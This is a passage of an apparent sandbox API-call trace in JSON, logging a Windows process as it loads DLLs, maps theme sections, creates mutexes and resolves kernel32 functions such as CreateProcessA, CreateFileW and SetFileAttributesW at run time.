"pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "DDRAW.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 74 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D8.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "D3D9.DLL" }, { "name": "ModuleHandle", "value": "0x00000000" } ], "repeated": 1, "id": 76 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "misc", "api": "RtlDosPathNameToNtPathName_U", "status": true, "return": "0x00000001", "arguments": [ { "name": "DosFileName", "value": "C:\\Windows\\System32\\MSCTF.dll" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000240" }, { "name": "DesiredAccess", "value": "0x00020000", "pretty_value": "READ_CONTROL" }, { "name": "FileName", "value": "C:\\Windows\\System32\\msctf.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\MSCTF" }, { "name": "DllBase", "value": "0x75650000" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\msctf" }, { "name": "BaseAddress", "value": "0x75650000" }, { "name": "InitRoutine", "value": "0x7569e400" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 83 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "synchronization", "api": "NtFindAtom", "status": true, "return": "0x00000000", "arguments": [ { "name": "AtomName", "value": "AfxOldWndProc423" }, { "name": "Atom", "value": "0x0000c0b4" } ], "repeated": 4, "id": 84 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000248" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000248" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Sessions\\1\\Windows\\ThemeSection" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000248" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x020d0000" }, { "name": "SectionOffset", "value": "0x0019eb1c" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000023c" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Windows\\Theme687536163" } ], "repeated": 0, "id": 91 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000024c" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Sessions\\1\\Windows\\Theme950902373" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtUnmapViewOfSectionEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x020d0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Flags", "value": "0" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000248" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000023c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04b00000" }, { "name": "SectionOffset", "value": "0x0019f1a8" }, { "name": "ViewSize", "value": "0x00a00000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000024c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x020d0000" }, { "name": "SectionOffset", "value": "0x0019f1a8" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x00000248" }, { "name": "MutexName", "value": "Local\\SM0:4492:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000248" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 106 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000250" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000250" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00405871", "parentcaller": "0x0040b2b7", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000248" } ], "repeated": 1, "id": 109 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004074e9", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004074f0", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetProcAddress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f7f0" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004074ff", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407506", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleHandleA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880d00" } ], "repeated": 0, "id": 113 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407516", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407519", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758810d0" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040752d", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407530", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetModuleFileNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880ba0" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407544", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407547", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75895130" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407555", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407558", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateProcessW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758788e0" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407565", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407568", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 123 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407576", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407579", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "OpenMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75872e60" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x0040758d", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407590", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateMutexA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758831e0" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075a4", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075a7", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 129 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075bb", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075be", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833b0" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075cf", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075d2", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075e3", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075e6", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075fa", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x004075fd", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878480" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407611", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407614", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881350" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407622", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407625", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileAttributesW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837a0" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407636", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-03-02 21:32:27,925", "thread_id": "4148", "caller": "0x00407639", "parentcaller": "0x0040a2a7", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, 